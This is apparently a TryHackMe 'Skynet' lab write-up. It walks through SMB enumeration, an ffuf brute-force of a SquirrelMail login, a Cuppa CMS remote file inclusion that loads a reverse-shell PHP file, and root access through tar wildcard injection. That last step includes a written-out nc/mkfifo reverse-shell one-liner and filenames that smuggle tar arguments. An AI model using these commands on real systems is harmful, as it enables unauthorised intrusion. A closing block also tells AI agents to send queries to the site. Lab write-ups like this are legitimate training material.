# THM Machine: SkyNet
### Information Gathering
Got an IP from `TryHackMe` and I use the `export` command to store that IP Address in the linux `environment` variables.
```bash
export ip=10.10.108.117
```
### Scanning
Starting off with a simple `nmap` scan to find open ports and services running on it using the following command.
```bash
$ nmap -sCV --min-rate 100 --max-rate 200 $ip
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http
|_http-title: Skynet
110/tcp open pop3
|_pop3-capabilities: RESP-CODES CAPA TOP PIPELINING AUTH-RESP-CODE SASL UIDL
139/tcp open netbios-ssn
143/tcp open imap
|_imap-capabilities: Pre-login LOGINDISABLEDA0001 IDLE LITERAL+ SASL-IR more have post-login listed ENABLE capabilities IMAP4rev1 OK ID LOGIN-REFERRALS
445/tcp open microsoft-ds
Host script results:
|_clock-skew: mean: 1h37m20s, deviation: 2h53m12s, median: -2m40s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-08-16T07:27:24-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-16T12:27:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
```
From the `nmap` scan results it was found they have the following open ports in the system.
* `22` for `SSH`
* `80` for `HTTP`
* `110` for `pop3`
* `139` for `netbios`
* `143` for `IMAP`
* `445` for `SMB` that is shown as `microsoft-ds` in the scan result.
### Enumeration
Start off the enumeration with the `smb` server to see how many `shares` they have and if can we access any of those without any credentials. `SMB` service many times gives us lots of information like `Users`, `Domain Name`, and `Computer Name`, etc.
**SMB**
**Listing The Shares**
```bash
$ smbclient -L ////$ip//
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
```
From the above shares listing, we can see there are some shares that are not come by default i.e `anonymous` and `milesdyson`. We can try to access that without giving a password.
```bash
smbclient //$ip/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 21:04:00 2020
.. D 0 Tue Sep 17 12:20:17 2019
attention.txt N 163 Wed Sep 18 08:04:59 2019
logs D 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5818464 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 09:42:16 2019
.. D 0 Thu Nov 26 21:04:00 2020
log2.txt N 0 Wed Sep 18 09:42:13 2019
log1.txt N 471 Wed Sep 18 09:41:59 2019
log3.txt N 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5818460 blocks available
```
We got success with `anonymous` shares and got some files that are present in them. Upon checking I see `log1.txt` has some kind of password list and `attention.txt` some information also but they also mentioned the name `Miles Dyson`. We see a share name related to that also.
**HTTP**
Now we start enumerating the `HTTP` server, In the webserver, we are often interested to find some login pages, hidden files, directories, any information related to `CMS` and its versions if applicable, and Backend technologies and their versions, etc. After knowing that we try to find vulnerabilities in it.
**Content-Discovery Result**
```bash
$ ffuf -w /usr/share/wordlist/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://$ip/FUZZ
admin [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 188ms]
css [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 188ms]
js [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 188ms]
config [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 189ms]
ai [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 188ms]
squirrelmail [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 248ms]
```
After running `ffuf` for content, discovery found some pages on which `squirrelmail` have login functionality. I tried the fuzz with the user `milesdyson` as username and `log1.txt` as passwords list to find some valid credentials, the command is like the following.
```bash
$ ffuf -w log1.txt:FUZZ -u http://10.10.108.117/squirrelmail/src/redirect.php -X POST -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-Type: application/x-www-form-urlencoded" -fs 1789
```
From above
* `-w` is used to specify the wordlist in that case it `log1.txt` file.
* `:FUZZ` is a keyword used to specify a FUZZING position, In which `:` is a separator and `FUZZ` is the actual keyword. Note we can avoid it for a single list but for multiple lists, we must supply it with different keywords.
* `-u` is used to specify the URL.
* `-X` is used to specify the request method.
* `-d` is used to specify the web request data.
* `-H` is used to specify the Request Header in that case it's `Content-Type: application/x-www-form-urlencoded` that must be supplied because we are sending a POST request with parameters.
* `-fs` is used to filter results by their response size. We got a different response and many of them had the same sizes that have wrong credentials so we filter that request size so we only get a few of them that have a valid login.
Using the above command we got a valid login credential.
**Valid Credentials**
```
milesdyson:cyborg007haloterminator
```
Using the above credentials we can login to the `squirrelmail` server which is an email server in which we can send and receive emails. There we see `milesdyson` the user has some emails that we can read, there we found an email that says the following.
**Samba Password reset**
```
We have changed your smb password after the system malfunction.
Password: )s{A&2Z=F^n_E.B`
```
Another Password was found.
**Other Emails and their content**.
```
From: serenakogan@skynet
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
---
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
```
Nothing Special there.
**SMB - Miles**
We have the `miles` smb password now so we can login using that.
```bash
$ smbclient //$ip/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 14:05:47 2019
.. D 0 Wed Sep 18 08:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:05:14 2019
notes D 0 Tue Sep 17 14:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:05:14 2019
9204224 blocks of size 1024. 5818448 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 14:18:40 2019
.. D 0 Tue Sep 17 14:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:01:29 2019
important.txt N 117 Tue Sep 17 14:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:01:29 2019
9204224 blocks of size 1024. 5818448 blocks available
```
From above we see `miles` users have so many files in their shares but one file catches my eye, `important.txt`. The **important.txt** file has some useful things.
```to-do
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
Above we see they write a To-do list in which they mentioned some important things related to his life and work but we are only interested in `/45kra24zxs28v3yd` that very looks like an http directory, and it is confirmed as a web directory when I visit. They are a valid directory but there is nothing special that we can exploit so I start the `ffuf` scan to do some content discovery.
**Content-Discovery - /45kra24zxs28v3yd**
```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:F -u http://$ip/45kra24zxs28v3yd/F -o ffuf2.log -ic
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.108.117/45kra24zxs28v3yd/F
:: Wordlist : F: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Output file : ffuf2.log
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
administrator [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 188ms]
```
Found an `administrator` endpoint very nice!!.
### Exploitation & Initial Access
Administrator Page mentioned it as a cuppa `CMS` and by using `searchsploit cuppa cms` we found a potential RFI`(Remote File Inclusion) vulnerability. Knowing that I download a php reverse shell code by`pentest monkey`. Make some changes related to IP and port number and host that file using a Python http server. Then I use the following command that exploits RFI vulnerability in which they request our` shell.php\` file and executed it that gives us a remote reverse shell.
> **Note:** Open your listener using `nc -lvnp 4444` before running the following command.
```bash
curl http://10.10.108.117/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$ip/shell.php
```
### Privilege Escalation
After gaining access to the system with a low-privilege user `www-data`, I start enumerating the system like finding `SUID` binaries, `sudo` permissions, etc but nothing special is found when I use the following command to see the content of a `crontab` file.
```shell
cat /etc/crontab
```
I see there is a `cronjob` running by the `root` user. They are running `/home/milesdyson/backups/backups.sh` on every minute. I checked if can I read the `backup.sh` file and I see I can and they have the following content.
```shell
www-data@skynet:/home/milesdyson/backups$ ll
total 1640
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 4413440 Aug 16 09:58 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```
There they backup everything in the `/var/www/html` directory to `backup.tgz`. One thing to note they use the wildcard `*` which means everything i.e files, directories, etc. This is a risky thing because there is a technique named wile card injection in which we can make files that look like an argument like the `ls` command in which we use an argument `-al` to list all files. For the `tar` binary, there is a documented way to execute the command with the following method.
```bash
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.186.33 5555 >/tmp/f" > shell.sh
```
Above we create a file `shell.sh` in `/var/www/html` that has a reverse shell command on it. Then use the following command to create a file that looks like an argument of the `tar` command that eventually executes the `shell.sh` file.
```bash
$ touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" touch "/var/www/html/--checkpoint=1"
```
> **Recap:** We make a file in the `/var/www/html` directory with the names `--checkpoint-action=exec=sh shell.sh`, `/var/www/html/--checkpoint=1` and `shell.sh` that has our reverse shell command on it.
So when the `cronjob` run `tar` the command executes and they take the directory name as an argument that executes our shell command. The `--checkpoint-action=exec=` is a legit argument of the `tar`command that is used to run a system command after compressing a file. By following the above method I eventually received a reverse shell back from the root user.
> **Note**: You have to start your listener using the `nc -lvnp 5555` Command so you can catch the reverse shell.
Now you are a `root` user copies the flags and submits them to TryHackMe and solves the machine.
```bash
$ cat /home/*/user.txt && cat /root/root.txt
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://w4h33d.gitbook.io/hack-notes/writeups/tryhackme/thm-machine-skynet.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
